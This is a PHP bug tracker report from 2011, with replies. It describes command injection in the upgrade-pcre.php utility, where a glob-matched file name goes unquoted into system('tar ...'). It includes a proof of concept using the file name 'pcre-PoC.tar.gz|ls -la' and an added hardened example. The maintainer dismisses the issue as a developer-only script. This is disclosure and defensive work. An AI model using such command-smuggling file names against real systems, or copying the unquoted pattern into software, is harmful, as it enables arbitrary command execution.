Sec Bug #55611 command injection
Submitted: 2011-09-05 18:05 UTC Modified: 2011-09-06 04:51 UTC
From: thinhhq at vng dot com dot vn Assigned:
Status: Not a bug Package: Unknown/Other Function
PHP Version: 5.3.8 OS: linux, unix
Private report: No CVE-ID: None
 [2011-09-05 18:05 UTC] thinhhq at vng dot com dot vn
Description:
------------
Command injection flaw found in /php-5.3.8/ext/pcre/upgrade-pcre.php:
-----snip snip ------
$pattern = 'pcre-*.tar.*';
$newpcre = glob($pattern);
if (count($newpcre) > 1) {
	echo "more than one '$pattern' file. aborting\n";
	print_r($newpcre);
	exit;
}
if (count($newpcre) == 0) {
	die("need one '$pattern' file. aborting.\n");
}
$newpcre = $newpcre[0];
if (strpos($newpcre, 'gz')) {
	system("tar xfz $newpcre"); //command injection
} elseif (strpos($newpcre, 'bz2')) {
	system("tar xfj $newpcre");//command injection
} else {
	die("file type not recognized: $newpcre\n");
}

-----snip snip ------

Test script:
---------------
PoC:
$ touch "pcre-PoC.tar.gz|ls -la"
$ php upgrade-pcre.php 
tar: pcre-PoC.tar.gz: Cannot open: No such file or directory
tar: Error is not recoverable: exiting now
tar: Child returned status 2
tar: Exiting with failure status due to previous errors
total 100
drwxr-xr-x  4 g4mm4 g4mm4  4096 2011-09-05 12:37 .
drwxr-xr-x 79 g4mm4 g4mm4  4096 2011-08-23 05:33 ..
-rw-r--r--  1 g4mm4 g4mm4  2764 2009-08-11 17:40 config0.m4
-rw-r--r--  1 g4mm4 g4mm4   714 2010-12-13 13:43 config.w32
-rw-r--r--  1 g4mm4 g4mm4    40 2007-09-26 11:44 CREDITS
drwxr-xr-x  4 g4mm4 g4mm4  4096 2011-08-23 05:32 pcrelib
-rw-r--r--  1 g4mm4 g4mm4     0 2011-09-05 12:37 pcre-PoC.tar.gz|ls -la
-rw-r--r--  1 g4mm4 g4mm4 59989 2011-08-05 18:39 php_pcre.c
-rw-r--r--  1 g4mm4 g4mm4   212 2009-01-11 08:59 php_pcre.def
-rw-r--r--  1 g4mm4 g4mm4  3280 2010-12-31 21:19 php_pcre.h
drwxr-xr-x  2 g4mm4 g4mm4  4096 2011-08-23 05:32 tests
-rw-r--r--  1 g4mm4 g4mm4  2876 2011-05-13 03:00 upgrade-pcre.php
processing pcrelib/AUTHORS... pcre-PoC/AUTHORS is not available any more


Expected result:
----------------
$ php upgrade-pcre.php

gzip: stdin: unexpected end of file
tar: Child returned status 1
tar: Exiting with failure status due to previous errors
processing pcrelib/AUTHORS... pcre-dsada/AUTHORS is not available any more


Actual result:
--------------
tar: pcre-PoC.tar.gz: Cannot open: No such file or directory
tar: Error is not recoverable: exiting now
tar: Child returned status 2
tar: Exiting with failure status due to previous errors
total 100
drwxr-xr-x  4 g4mm4 g4mm4  4096 2011-09-05 12:37 .
drwxr-xr-x 79 g4mm4 g4mm4  4096 2011-08-23 05:33 ..
-rw-r--r--  1 g4mm4 g4mm4  2764 2009-08-11 17:40 config0.m4
-rw-r--r--  1 g4mm4 g4mm4   714 2010-12-13 13:43 config.w32
-rw-r--r--  1 g4mm4 g4mm4    40 2007-09-26 11:44 CREDITS
drwxr-xr-x  4 g4mm4 g4mm4  4096 2011-08-23 05:32 pcrelib
-rw-r--r--  1 g4mm4 g4mm4     0 2011-09-05 12:37 pcre-PoC.tar.gz|ls -la
-rw-r--r--  1 g4mm4 g4mm4 59989 2011-08-05 18:39 php_pcre.c
-rw-r--r--  1 g4mm4 g4mm4   212 2009-01-11 08:59 php_pcre.def
-rw-r--r--  1 g4mm4 g4mm4  3280 2010-12-31 21:19 php_pcre.h
drwxr-xr-x  2 g4mm4 g4mm4  4096 2011-08-23 05:32 tests
-rw-r--r--  1 g4mm4 g4mm4  2876 2011-05-13 03:00 upgrade-pcre.php
processing pcrelib/AUTHORS... pcre-PoC/AUTHORS is not available any more
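
The extraction step quoted in the report, rewritten so that the file name reaches tar as a single argument. This is an added example, not code from the PHP source tree or from either participant; `pick_archive()` and `tar_command()` are hypothetical helper names, and `pcre-8.12.tar.bz2` is a constructed sample name.

```php
<?php
// Added example: hardened form of the extraction step (not the project's code).
// pick_archive() and tar_command() are hypothetical helper names.

/** Accept exactly one candidate whose name matches a strict allow-list. */
function pick_archive(array $candidates): string
{
    if (count($candidates) !== 1) {
        throw new RuntimeException("need exactly one 'pcre-*.tar.*' file");
    }
    $name = basename($candidates[0]);
    // Only pcre-<version>.tar.gz / .tar.bz2; \A and \z anchor the whole string.
    if (!preg_match('/\Apcre-[0-9A-Za-z._]+\.tar\.(?:gz|bz2)\z/', $name)) {
        throw new RuntimeException('unexpected archive name: ' . var_export($name, true));
    }
    return $name;
}

/** Build the tar command line with the file name as a single quoted word. */
function tar_command(string $archive): string
{
    // Decide by suffix rather than strpos(), which matches 'gz' anywhere.
    $mode = substr($archive, -3) === '.gz' ? 'xzf' : 'xjf';
    // The allow-list guarantees the name starts with "pcre-", so tar cannot
    // read it as an option; escapeshellarg() keeps shell metacharacters literal.
    return 'tar ' . $mode . ' ' . escapeshellarg($archive);
}

// Constructed inputs: a plain name and the name used in the report's PoC.
$samples = ['pcre-8.12.tar.bz2', 'pcre-PoC.tar.gz|ls -la'];
foreach ($samples as $sample) {
    // Quoting alone already makes the name one argument to tar.
    echo 'quoted:   tar xzf ', escapeshellarg($sample), "\n";
    try {
        echo 'accepted: ', tar_command(pick_archive([$sample])), "\n";
    } catch (RuntimeException $e) {
        echo 'rejected: ', $e->getMessage(), "\n";
    }
}
// In the script itself:
// system(tar_command(pick_archive(glob('pcre-*.tar.*') ?: [])));
```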


 [2011-09-05 18:29 UTC] scottmac@php.net
-Status: Open +Status: Bogus
 [2011-09-05 18:29 UTC] scottmac@php.net
This is a utility script for PHP developers to update the bundled PCRE. If you 
can write to my filesystem then I think there are bigger problems, could you add 
a new *.c file?
 [2011-09-06 04:37 UTC] thinhhq at vng dot com dot vn
Hi Scott,
I think it's seriously a bug when I read the comment in the file source:
$ more -4 upgrade-pcre.php
<?php
// script to upgrade PCRE. just drop the pcre-x.x.tar.xx here and run the script
...
...
Maybe pcre-x.x.tar.xx can be downloaded from anywhere, from unknown sources??? After that, the sysadmin just thinks they are decompressing pcre-x.x.tar :).
Regards
--Thinhhq
 [2011-09-06 04:51 UTC] scottmac@php.net
This isn't for sysadmins. This is for PHP core contributors who are upgrading 
PCRE for the bundled release. I'll update the comment next time I run the script 
and upgrade PCRE.

At the moment it's about 4 people who use this script before committing the 
results.